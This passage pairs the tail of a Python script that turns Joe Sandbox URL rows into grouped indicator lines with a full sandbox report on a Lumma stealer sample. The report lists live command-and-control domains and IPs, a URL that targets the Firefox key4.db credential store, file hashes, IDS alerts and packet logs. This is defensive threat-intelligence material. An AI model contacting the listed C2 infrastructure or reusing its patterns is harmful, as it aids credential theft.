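# (true/false) run together. These four rows are copied from this report's
# URL table and used here as constructed test input.
SAMPLE_ROWS = """\
https://steamcommunity.com/my/wishlist/file.exe, 00000000.00000003.1700607333.00000000012DB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1690548980.00000000012D1000.00000004.00000020.00020000.00000000.sdmpfalse
https://sergei-esenin.com/apiwzfile.exe, 00000000.00000003.1851345687.0000000005BDD000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1858209085.0000000005BDD000.00000004.00000800.00020000.00000000.sdmptrue
https://dissapoiznw.store:443/apifile.exe, 00000000.00000002.1852469176.000000000124F000.00000004.00000020.00020000.00000000.sdmpfalse
https://sergei-esenin.com:443/api4p.default-release/key4.dbPKfile.exe, 00000000.00000002.1852469176.000000000124F000.00000004.00000020.00020000.00000000.sdmptrue
"""

# Host -> (IP, ASN) copied from the report's IP table.
IP_TABLE = {
    "sergei-esenin.com": ("104.21.53.8", "13335 CLOUDFLARENET"),
    "steamcommunity.com": ("104.102.49.254", "16625 AKAMAI-AS"),
}

# Assumption: the source process is always "file.exe" (the sample name), so
# the first "file.exe, " marks where the URL column ends.
ROW_RE = re.compile(
    r"^(?P<url>https?://.+?)"      # URL, up to the first source marker
    r"(?P<src>file\.exe, .*?)"     # process name plus the dump list
    r"(?P<mal>true|false)$"        # Joe Sandbox "Malicious" column
)
DUMP_RE = re.compile(r"\S+\.sdmp")


def parse_row(line):
    """Split one flattened row into url/host/malicious/dumps, or None."""
    m = ROW_RE.match(line.strip())
    if not m:
        return None
    url = m.group("url")
    return {
        "url": url,
        "host": urlsplit(url).hostname,   # drops the ":443" port suffix
        "malicious": m.group("mal") == "true",
        "dumps": DUMP_RE.findall(m.group("src")),
    }


def parse_rows(text):
    rows = (parse_row(line) for line in text.splitlines() if line.strip())
    return [r for r in rows if r]


def flagged_hosts(records):
    """Hosts with at least one URL the sandbox marked malicious, with every
    URL seen for that host and the union of dump IDs they were carved from."""
    by_host = defaultdict(lambda: {"malicious": False, "urls": [], "dumps": set()})
    for r in records:
        entry = by_host[r["host"]]
        entry["urls"].append(r["url"])
        entry["dumps"].update(r["dumps"])
        entry["malicious"] |= r["malicious"]
    return {h: v for h, v in by_host.items() if v["malicious"]}


def ioc_lines(records):
    """One tab-separated line per flagged host, enriched from IP_TABLE."""
    out = []
    for host, info in sorted(flagged_hosts(records).items()):
        ip, asn = IP_TABLE.get(host, ("?", "?"))
        out.append(f"{host}\t{ip}\t{asn}\t{len(info['urls'])} url(s)\t"
                   f"{len(info['dumps'])} dump(s)")
    return out


if __name__ == "__main__":
    for line in ioc_lines(parse_rows(SAMPLE_ROWS)):
        print(line)
```

The host grouping is what matters for triage: dissapoiznw.store and clearancek.site are not flagged in this report even though they sit in the same memory region as the flagged sergei-esenin.com URL, so a practitioner building block lists from the Malicious column alone would miss them; the grouped output makes that gap visible instead of hiding it in the row order.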
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1538068
Start date and time: 2024-10-20 08:38:08 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 5m 14s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 6
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: file.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@1/0@10/2
EGA Information: Failed
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target file.exe, PID 7436 because there are no executed functions
• Not all processes were analyzed; the report is missing behavior information
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
02:38:58 | API Interceptor | 11x Sleep call for process: file.exe modified
                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                            104.21.53.8cH4EGgNUR7.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                              6FecO9d3l9.exeGet hashmaliciousLummaCBrowse
| | S3AYU5t2JP.exe | malicious | LummaC, Amadey, Stealc | |
| | PTc16LnPI5.exe | malicious | LummaC | |
| | yRMHuXP8fH.exe | malicious | LummaC | |
| | FwJnQcLliE.exe | malicious | LummaC | |
| | file.exe | malicious | LummaC | |
| | file.exe | malicious | LummaC | |
| | SecuriteInfo.com.Win32.Evo-gen.11702.30674.exe | malicious | LummaC | |
| | SecuriteInfo.com.Win64.Malware-gen.32137.30234.exe | malicious | LummaC, Go Injector, LummaC Stealer | |
| 104.102.49.254 | http://gtm-cn-j4g3qqvf603.steamproxy1.com/ | malicious | Unknown | www.valvesoftware.com/legal.htm |
| Match | Associated Sample Name / URL | Detection | Threat Name | Context |
| sergei-esenin.com | file.exe | malicious | LummaC | 172.67.206.204 |
| sergei-esenin.com | cH4EGgNUR7.exe | malicious | LummaC | 104.21.53.8 |
| sergei-esenin.com | 6FecO9d3l9.exe | malicious | LummaC | 104.21.53.8 |
| sergei-esenin.com | 2WWOAq4c3b.exe | malicious | LummaC | 172.67.206.204 |
| sergei-esenin.com | EY2raBetTi.exe | malicious | LummaC | 172.67.206.204 |
| sergei-esenin.com | file.exe | malicious | LummaC | 172.67.206.204 |
| sergei-esenin.com | S3AYU5t2JP.exe | malicious | LummaC, Amadey, Stealc | 104.21.53.8 |
| sergei-esenin.com | PTc16LnPI5.exe | malicious | LummaC | 104.21.53.8 |
| sergei-esenin.com | yRMHuXP8fH.exe | malicious | LummaC | 104.21.53.8 |
| sergei-esenin.com | FwJnQcLliE.exe | malicious | LummaC | 104.21.53.8 |
| steamcommunity.com | aZm1EZ2IYr.exe | malicious | Vidar | 104.102.49.254 |
| steamcommunity.com | file.exe | malicious | LummaC | 104.102.49.254 |
| steamcommunity.com | file.exe | malicious | LummaC | 104.102.49.254 |
| steamcommunity.com | cH4EGgNUR7.exe | malicious | LummaC | 104.102.49.254 |
| steamcommunity.com | 6FecO9d3l9.exe | malicious | LummaC | 104.102.49.254 |
| steamcommunity.com | 2WWOAq4c3b.exe | malicious | LummaC | 104.102.49.254 |
| steamcommunity.com | EY2raBetTi.exe | malicious | LummaC | 104.102.49.254 |
| steamcommunity.com | file.exe | malicious | LummaC | 104.102.49.254 |
| steamcommunity.com | S3AYU5t2JP.exe | malicious | LummaC, Amadey, Stealc | 104.102.49.254 |
| steamcommunity.com | PTc16LnPI5.exe | malicious | LummaC | 104.102.49.254 |
| Match | Associated Sample Name / URL | Detection | Threat Name | Context |
| CLOUDFLARENETUS | file.exe | malicious | LummaC | 172.67.206.204 |
| CLOUDFLARENETUS | cH4EGgNUR7.exe | malicious | LummaC | 188.114.96.3 |
| CLOUDFLARENETUS | 6FecO9d3l9.exe | malicious | LummaC | 188.114.97.3 |
| CLOUDFLARENETUS | 2WWOAq4c3b.exe | malicious | LummaC | 172.67.206.204 |
| CLOUDFLARENETUS | EY2raBetTi.exe | malicious | LummaC | 172.67.206.204 |
| CLOUDFLARENETUS | file.exe | malicious | LummaC | 172.67.206.204 |
| CLOUDFLARENETUS | S3AYU5t2JP.exe | malicious | LummaC, Amadey, Stealc | 104.21.53.8 |
| CLOUDFLARENETUS | PTc16LnPI5.exe | malicious | LummaC | 188.114.97.3 |
| CLOUDFLARENETUS | yRMHuXP8fH.exe | malicious | LummaC | 188.114.96.3 |
| CLOUDFLARENETUS | FwJnQcLliE.exe | malicious | LummaC | 188.114.97.3 |
| AKAMAI-ASUS | aZm1EZ2IYr.exe | malicious | Vidar | 104.102.49.254 |
| AKAMAI-ASUS | file.exe | malicious | LummaC | 104.102.49.254 |
| AKAMAI-ASUS | file.exe | malicious | LummaC | 104.102.49.254 |
| AKAMAI-ASUS | cH4EGgNUR7.exe | malicious | LummaC | 104.102.49.254 |
| AKAMAI-ASUS | 6FecO9d3l9.exe | malicious | LummaC | 104.102.49.254 |
| AKAMAI-ASUS | 2WWOAq4c3b.exe | malicious | LummaC | 104.102.49.254 |
| AKAMAI-ASUS | EY2raBetTi.exe | malicious | LummaC | 104.102.49.254 |
| AKAMAI-ASUS | file.exe | malicious | LummaC | 104.102.49.254 |
| AKAMAI-ASUS | S3AYU5t2JP.exe | malicious | LummaC, Amadey, Stealc | 104.102.49.254 |
| AKAMAI-ASUS | PTc16LnPI5.exe | malicious | LummaC | 104.102.49.254 |
| Match | Associated Sample Name / URL | Detection | Threat Name | Context |
| a0e9f5d64349fb13191bc781f81f42e1 | file.exe | malicious | LummaC | 104.21.53.8, 104.102.49.254 |
| a0e9f5d64349fb13191bc781f81f42e1 | file.exe | malicious | LummaC | 104.21.53.8, 104.102.49.254 |
| a0e9f5d64349fb13191bc781f81f42e1 | cH4EGgNUR7.exe | malicious | LummaC | 104.21.53.8, 104.102.49.254 |
| a0e9f5d64349fb13191bc781f81f42e1 | 6FecO9d3l9.exe | malicious | LummaC | 104.21.53.8, 104.102.49.254 |
| a0e9f5d64349fb13191bc781f81f42e1 | 2WWOAq4c3b.exe | malicious | LummaC | 104.21.53.8, 104.102.49.254 |
| a0e9f5d64349fb13191bc781f81f42e1 | EY2raBetTi.exe | malicious | LummaC | 104.21.53.8, 104.102.49.254 |
| a0e9f5d64349fb13191bc781f81f42e1 | file.exe | malicious | LummaC | 104.21.53.8, 104.102.49.254 |
| a0e9f5d64349fb13191bc781f81f42e1 | S3AYU5t2JP.exe | malicious | LummaC, Amadey, Stealc | 104.21.53.8, 104.102.49.254 |
| a0e9f5d64349fb13191bc781f81f42e1 | PTc16LnPI5.exe | malicious | LummaC | 104.21.53.8, 104.102.49.254 |
| a0e9f5d64349fb13191bc781f81f42e1 | yRMHuXP8fH.exe | malicious | LummaC | 104.21.53.8, 104.102.49.254 |
No context

No created / dropped files found

File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 6.4914421253430215
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: file.exe
File size: 3'058'688 bytes
MD5: ae7fda647df94fb9207204a517856151
SHA1: 57e738f83c355c72b9d48e0b120a27c40889c38e
SHA256: 7da052a541128f2cdacb400d37b765039cac8b4e293fc53a88ac721c144950c9
SHA512: 2322a8dad5b877cc395d30bc62220b3ec07fdc06a3e3db8259dab2b5d2c295614bd9e0eb4024ca965ea026f1681e6c46a74ade1f4a53bc2a6c54a8275995181d
SSDEEP: 49152:x6/bIcXnLK66wyhxMG+OabqF4hI0hLIAqVh63ZQ46s2I:x6/UcXDyhxMG+OabqF4hI0hLI1VhYZQi
TLSH: 3AE55CA1B90A72CFC48F1678942BCF86599D43B9471408C798ACF47ABDA3DC135F6C29
File Content Preview: MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...J..f.............................02...........@..........................`2......g/...@.................................W...k..
Icon Hash: 90cececece8e8eb0
Entrypoint: 0x723000
Entrypoint Section: .taggant
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp: 0x66FFF14A [Fri Oct 4 13:44:42 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 6
OS Version Minor: 0
File Version Major: 6
File Version Minor: 0
Subsystem Version Major: 6
Subsystem Version Minor: 0
Import Hash: 2eabe9054cad5152567f0699947a2c5b
Data directories:

Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0x5f057          0x6b          .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE        0x0              0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x5f1f8          0x8           .idata
IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x0              0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
PE sections:

Name      Virtual Address  Virtual Size  Raw Size  MD5                               Xored PE  ZLIB Complexity      File Type             Entropy             Characteristics
          0x1000           0x5d000       0x25e00   db21758e7064a7e029673a1972d9454a  False     0.9995487830033003   data                  7.982552792221966   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc     0x5e000          0x1000        0x0       d41d8cd98f00b204e9800998ecf8427e  False     0                    empty                 0.0                 IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata    0x5f000          0x1000        0x200     fe72def8b74193a84232a780098a7ce0  False     0.150390625          data                  1.04205214219471    IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
teechqve  0x60000          0x2c2000      0x2c1600  56d248749240a16ac085933783549cec  unknown   unknown              unknown               unknown             IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
nqocidhr  0x322000         0x1000        0x400     3fabf83997a90627a203ee99096ffc96  False     0.794921875          data                  6.215472207497749   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant  0x323000         0x3000        0x2200    26b9ba7e2434d588d5dab1729efc2c2a  False     0.06376378676470588  DOS executable (COM)  0.7991853633956142  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Imports:

DLL           Import
kernel32.dll  lstrcpy
Suricata IDS alerts:

Timestamp                         SID      Signature                                                                            Severity  Source IP    Source Port  Dest IP         Dest Port  Protocol
2024-10-20T08:38:59.571722+0200   2056471  ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (clearancek .site)    1         192.168.2.4  59915        1.1.1.1         53         UDP
2024-10-20T08:38:59.584613+0200   2056485  ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mobbipenju .store)   1         192.168.2.4  63670        1.1.1.1         53         UDP
2024-10-20T08:38:59.602547+0200   2056483  ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (eaglepawnoy .store)  1         192.168.2.4  55049        1.1.1.1         53         UDP
2024-10-20T08:38:59.614174+0200   2056481  ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dissapoiznw .store)  1         192.168.2.4  59702        1.1.1.1         53         UDP
2024-10-20T08:38:59.626740+0200   2056479  ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (studennotediw .store) 1        192.168.2.4  51355        1.1.1.1         53         UDP
2024-10-20T08:38:59.636719+0200   2056477  ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bathdoomgaz .store)  1         192.168.2.4  49241        1.1.1.1         53         UDP
2024-10-20T08:38:59.648118+0200   2056475  ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (spirittunek .store)  1         192.168.2.4  64120        1.1.1.1         53         UDP
2024-10-20T08:38:59.660237+0200   2056473  ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (licendfilteo .site)  1         192.168.2.4  62543        1.1.1.1         53         UDP
2024-10-20T08:39:01.696060+0200   2858666  ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup                                1         192.168.2.4  49730        104.102.49.254  443        TCP
2024-10-20T08:39:02.704882+0200   2049836  ET MALWARE Lumma Stealer Related Activity                                             1         192.168.2.4  49731        104.21.53.8     443        TCP
2024-10-20T08:39:02.704882+0200   2054653  ET MALWARE Lumma Stealer CnC Host Checkin                                             1         192.168.2.4  49731        104.21.53.8     443        TCP
2024-10-20T08:39:04.345979+0200   2049812  ET MALWARE Lumma Stealer Related Activity M2                                          1         192.168.2.4  49732        104.21.53.8     443        TCP
2024-10-20T08:39:04.345979+0200   2054653  ET MALWARE Lumma Stealer CnC Host Checkin                                             1         192.168.2.4  49732        104.21.53.8     443        TCP
2024-10-20T08:39:07.882161+0200   2048094  ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration                                 1         192.168.2.4  49734        104.21.53.8     443        TCP
2024-10-20T08:39:17.692929+0200   2054653  ET MALWARE Lumma Stealer CnC Host Checkin                                             1         192.168.2.4  49739        104.21.53.8     443        TCP
TCP packets:

Timestamp                           Source Port  Dest Port  Source IP       Dest IP
Oct 20, 2024 08:38:59.691245079 CEST  49730        443        192.168.2.4     104.102.49.254
Oct 20, 2024 08:38:59.691354036 CEST  443          49730      104.102.49.254  192.168.2.4
Oct 20, 2024 08:38:59.691447020 CEST  49730        443        192.168.2.4     104.102.49.254
Oct 20, 2024 08:38:59.715997934 CEST  49730        443        192.168.2.4     104.102.49.254
Oct 20, 2024 08:38:59.716048956 CEST  443          49730      104.102.49.254  192.168.2.4
Oct 20, 2024 08:39:00.798187971 CEST  443          49730      104.102.49.254  192.168.2.4
Oct 20, 2024 08:39:00.798295021 CEST  49730        443        192.168.2.4     104.102.49.254
Oct 20, 2024 08:39:00.807801008 CEST  49730        443        192.168.2.4     104.102.49.254
Oct 20, 2024 08:39:00.807828903 CEST  443          49730      104.102.49.254  192.168.2.4
Oct 20, 2024 08:39:00.808248997 CEST  443          49730      104.102.49.254  192.168.2.4
Oct 20, 2024 08:39:00.850914955 CEST  49730        443        192.168.2.4     104.102.49.254
Oct 20, 2024 08:39:00.855911970 CEST  49730        443        192.168.2.4     104.102.49.254
Oct 20, 2024 08:39:00.903398037 CEST  443          49730      104.102.49.254  192.168.2.4
Oct 20, 2024 08:39:01.696165085 CEST  443          49730      104.102.49.254  192.168.2.4
Oct 20, 2024 08:39:01.696191072 CEST  443          49730      104.102.49.254  192.168.2.4
Oct 20, 2024 08:39:01.696238995 CEST  443          49730      104.102.49.254  192.168.2.4
                                                                                                                                                                                Oct 20, 2024 08:39:01.696253061 CEST44349730104.102.49.254192.168.2.4
                                                                                                                                                                                Oct 20, 2024 08:39:01.696275949 CEST44349730104.102.49.254192.168.2.4
                                                                                                                                                                                Oct 20, 2024 08:39:01.696357012 CEST49730443192.168.2.4104.102.49.254
                                                                                                                                                                                Oct 20, 2024 08:39:01.696357965 CEST49730443192.168.2.4104.102.49.254
                                                                                                                                                                                Oct 20, 2024 08:39:01.696357965 CEST49730443192.168.2.4104.102.49.254
                                                                                                                                                                                Oct 20, 2024 08:39:01.696393013 CEST44349730104.102.49.254192.168.2.4
                                                                                                                                                                                Oct 20, 2024 08:39:01.696420908 CEST44349730104.102.49.254192.168.2.4
                                                                                                                                                                                Oct 20, 2024 08:39:01.696434975 CEST44349730104.102.49.254192.168.2.4
                                                                                                                                                                                Oct 20, 2024 08:39:01.696595907 CEST49730443192.168.2.4104.102.49.254
                                                                                                                                                                                Oct 20, 2024 08:39:01.696595907 CEST49730443192.168.2.4104.102.49.254
                                                                                                                                                                                Oct 20, 2024 08:39:01.698622942 CEST49730443192.168.2.4104.102.49.254
                                                                                                                                                                                Oct 20, 2024 08:39:01.698688030 CEST44349730104.102.49.254192.168.2.4
                                                                                                                                                                                Oct 20, 2024 08:39:01.752804041 CEST49731443192.168.2.4104.21.53.8
                                                                                                                                                                                Oct 20, 2024 08:39:01.752890110 CEST44349731104.21.53.8192.168.2.4
                                                                                                                                                                                Oct 20, 2024 08:39:01.752993107 CEST49731443192.168.2.4104.21.53.8
                                                                                                                                                                                Oct 20, 2024 08:39:01.753384113 CEST49731443192.168.2.4104.21.53.8
                                                                                                                                                                                Oct 20, 2024 08:39:01.753437042 CEST44349731104.21.53.8192.168.2.4
                                                                                                                                                                                Oct 20, 2024 08:39:02.528721094 CEST44349731104.21.53.8192.168.2.4
                                                                                                                                                                                Oct 20, 2024 08:39:02.528816938 CEST49731443192.168.2.4104.21.53.8
                                                                                                                                                                                Oct 20, 2024 08:39:02.531512976 CEST49731443192.168.2.4104.21.53.8
                                                                                                                                                                                Oct 20, 2024 08:39:02.531539917 CEST44349731104.21.53.8192.168.2.4
                                                                                                                                                                                Oct 20, 2024 08:39:02.531893015 CEST44349731104.21.53.8192.168.2.4
                                                                                                                                                                                Oct 20, 2024 08:39:02.533134937 CEST49731443192.168.2.4104.21.53.8
                                                                                                                                                                                Oct 20, 2024 08:39:02.533171892 CEST49731443192.168.2.4104.21.53.8
                                                                                                                                                                                Oct 20, 2024 08:39:02.533247948 CEST44349731104.21.53.8192.168.2.4
                                                                                                                                                                                Oct 20, 2024 08:39:02.704909086 CEST44349731104.21.53.8192.168.2.4
                                                                                                                                                                                Oct 20, 2024 08:39:02.704969883 CEST44349731104.21.53.8192.168.2.4
                                                                                                                                                                                Oct 20, 2024 08:39:02.705032110 CEST44349731104.21.53.8192.168.2.4
                                                                                                                                                                                Oct 20, 2024 08:39:02.705046892 CEST49731443192.168.2.4104.21.53.8
                                                                                                                                                                                Oct 20, 2024 08:39:02.705075026 CEST44349731104.21.53.8192.168.2.4
                                                                                                                                                                                Oct 20, 2024 08:39:02.705136061 CEST49731443192.168.2.4104.21.53.8
                                                                                                                                                                                Oct 20, 2024 08:39:02.705152035 CEST44349731104.21.53.8192.168.2.4
                                                                                                                                                                                Oct 20, 2024 08:39:02.705178976 CEST44349731104.21.53.8192.168.2.4
                                                                                                                                                                                Oct 20, 2024 08:39:02.705248117 CEST49731443192.168.2.4104.21.53.8
                                                                                                                                                                                Oct 20, 2024 08:39:02.706109047 CEST49731443192.168.2.4104.21.53.8
                                                                                                                                                                                Oct 20, 2024 08:39:02.706139088 CEST44349731104.21.53.8192.168.2.4
                                                                                                                                                                                Oct 20, 2024 08:39:02.706170082 CEST49731443192.168.2.4104.21.53.8
                                                                                                                                                                                Oct 20, 2024 08:39:02.706185102 CEST44349731104.21.53.8192.168.2.4
                                                                                                                                                                                Oct 20, 2024 08:39:02.775787115 CEST49732443192.168.2.4104.21.53.8
                                                                                                                                                                                Oct 20, 2024 08:39:02.775820017 CEST44349732104.21.53.8192.168.2.4
                                                                                                                                                                                Oct 20, 2024 08:39:02.775899887 CEST49732443192.168.2.4104.21.53.8
                                                                                                                                                                                Oct 20, 2024 08:39:02.776146889 CEST49732443192.168.2.4104.21.53.8
                                                                                                                                                                                Oct 20, 2024 08:39:02.776164055 CEST44349732104.21.53.8192.168.2.4
                                                                                                                                                                                Oct 20, 2024 08:39:03.546849012 CEST44349732104.21.53.8192.168.2.4
                                                                                                                                                                                Oct 20, 2024 08:39:03.546914101 CEST49732443192.168.2.4104.21.53.8
                                                                                                                                                                                Oct 20, 2024 08:39:03.551188946 CEST49732443192.168.2.4104.21.53.8
                                                                                                                                                                                Oct 20, 2024 08:39:03.551202059 CEST44349732104.21.53.8192.168.2.4
                                                                                                                                                                                Oct 20, 2024 08:39:03.551415920 CEST44349732104.21.53.8192.168.2.4
                                                                                                                                                                                Oct 20, 2024 08:39:03.558259964 CEST49732443192.168.2.4104.21.53.8
                                                                                                                                                                                Oct 20, 2024 08:39:03.558295965 CEST49732443192.168.2.4104.21.53.8
                                                                                                                                                                                Oct 20, 2024 08:39:03.558321953 CEST44349732104.21.53.8192.168.2.4
                                                                                                                                                                                Oct 20, 2024 08:39:04.345999956 CEST44349732104.21.53.8192.168.2.4
                                                                                                                                                                                Oct 20, 2024 08:39:04.346034050 CEST44349732104.21.53.8192.168.2.4
                                                                                                                                                                                Oct 20, 2024 08:39:04.346052885 CEST44349732104.21.53.8192.168.2.4
                                                                                                                                                                                Oct 20, 2024 08:39:04.346071959 CEST49732443192.168.2.4104.21.53.8
                                                                                                                                                                                Oct 20, 2024 08:39:04.346084118 CEST44349732104.21.53.8192.168.2.4
                                                                                                                                                                                Oct 20, 2024 08:39:04.346126080 CEST49732443192.168.2.4104.21.53.8
                                                                                                                                                                                Oct 20, 2024 08:39:04.346131086 CEST44349732104.21.53.8192.168.2.4
                                                                                                                                                                                Oct 20, 2024 08:39:04.346163034 CEST44349732104.21.53.8192.168.2.4
                                                                                                                                                                                Oct 20, 2024 08:39:04.346190929 CEST44349732104.21.53.8192.168.2.4
                                                                                                                                                                                Oct 20, 2024 08:39:04.346201897 CEST49732443192.168.2.4104.21.53.8
                                                                                                                                                                                Oct 20, 2024 08:39:04.346206903 CEST44349732104.21.53.8192.168.2.4
                                                                                                                                                                                Oct 20, 2024 08:39:04.346244097 CEST49732443192.168.2.4104.21.53.8
                                                                                                                                                                                Oct 20, 2024 08:39:04.346246958 CEST44349732104.21.53.8192.168.2.4
                                                                                                                                                                                Oct 20, 2024 08:39:04.346277952 CEST44349732104.21.53.8192.168.2.4
                                                                                                                                                                                Oct 20, 2024 08:39:04.346314907 CEST49732443192.168.2.4104.21.53.8
                                                                                                                                                                                Oct 20, 2024 08:39:04.346318960 CEST44349732104.21.53.8192.168.2.4
                                                                                                                                                                                Oct 20, 2024 08:39:04.397763968 CEST49732443192.168.2.4104.21.53.8
                                                                                                                                                                                Oct 20, 2024 08:39:04.493994951 CEST44349732104.21.53.8192.168.2.4
                                                                                                                                                                                Oct 20, 2024 08:39:04.494046926 CEST44349732104.21.53.8192.168.2.4
                                                                                                                                                                                Oct 20, 2024 08:39:04.494066000 CEST44349732104.21.53.8192.168.2.4
                                                                                                                                                                                Oct 20, 2024 08:39:04.494091988 CEST49732443192.168.2.4104.21.53.8
                                                                                                                                                                                Oct 20, 2024 08:39:04.494098902 CEST44349732104.21.53.8192.168.2.4
                                                                                                                                                                                Oct 20, 2024 08:39:04.494136095 CEST49732443192.168.2.4104.21.53.8
                                                                                                                                                                                Oct 20, 2024 08:39:04.494139910 CEST44349732104.21.53.8192.168.2.4
                                                                                                                                                                                Oct 20, 2024 08:39:04.494240999 CEST49732443192.168.2.4104.21.53.8
                                                                                                                                                                                Oct 20, 2024 08:39:04.494246006 CEST44349732104.21.53.8192.168.2.4
                                                                                                                                                                                Oct 20, 2024 08:39:04.494256973 CEST44349732104.21.53.8192.168.2.4
                                                                                                                                                                                Oct 20, 2024 08:39:04.618071079 CEST49733443192.168.2.4104.21.53.8
                                                                                                                                                                                Oct 20, 2024 08:39:04.618122101 CEST44349733104.21.53.8192.168.2.4
                                                                                                                                                                                Oct 20, 2024 08:39:04.618201017 CEST49733443192.168.2.4104.21.53.8
                                                                                                                                                                                Oct 20, 2024 08:39:04.618480921 CEST49733443192.168.2.4104.21.53.8
                                                                                                                                                                                Oct 20, 2024 08:39:04.618495941 CEST44349733104.21.53.8192.168.2.4
                                                                                                                                                                                Oct 20, 2024 08:39:05.386384964 CEST44349733104.21.53.8192.168.2.4
                                                                                                                                                                                Oct 20, 2024 08:39:05.386449099 CEST49733443192.168.2.4104.21.53.8
                                                                                                                                                                                Oct 20, 2024 08:39:05.387806892 CEST49733443192.168.2.4104.21.53.8
                                                                                                                                                                                Oct 20, 2024 08:39:05.387814999 CEST44349733104.21.53.8192.168.2.4
                                                                                                                                                                                Oct 20, 2024 08:39:05.388052940 CEST44349733104.21.53.8192.168.2.4
                                                                                                                                                                                Oct 20, 2024 08:39:05.389374971 CEST49733443192.168.2.4104.21.53.8
                                                                                                                                                                                Oct 20, 2024 08:39:05.389523983 CEST49733443192.168.2.4104.21.53.8
                                                                                                                                                                                Oct 20, 2024 08:39:05.389554024 CEST44349733104.21.53.8192.168.2.4
                                                                                                                                                                                Oct 20, 2024 08:39:05.389611959 CEST49733443192.168.2.4104.21.53.8
                                                                                                                                                                                Oct 20, 2024 08:39:05.389621019 CEST44349733104.21.53.8192.168.2.4
                                                                                                                                                                                Oct 20, 2024 08:39:06.400767088 CEST44349733104.21.53.8192.168.2.4
                                                                                                                                                                                Oct 20, 2024 08:39:06.400830984 CEST44349733104.21.53.8192.168.2.4
                                                                                                                                                                                Oct 20, 2024 08:39:06.400892019 CEST49733443192.168.2.4104.21.53.8
                                                                                                                                                                                Oct 20, 2024 08:39:06.400966883 CEST49733443192.168.2.4104.21.53.8
                                                                                                                                                                                Oct 20, 2024 08:39:06.400984049 CEST44349733104.21.53.8192.168.2.4
                                                                                                                                                                                Oct 20, 2024 08:39:06.493166924 CEST49734443192.168.2.4104.21.53.8
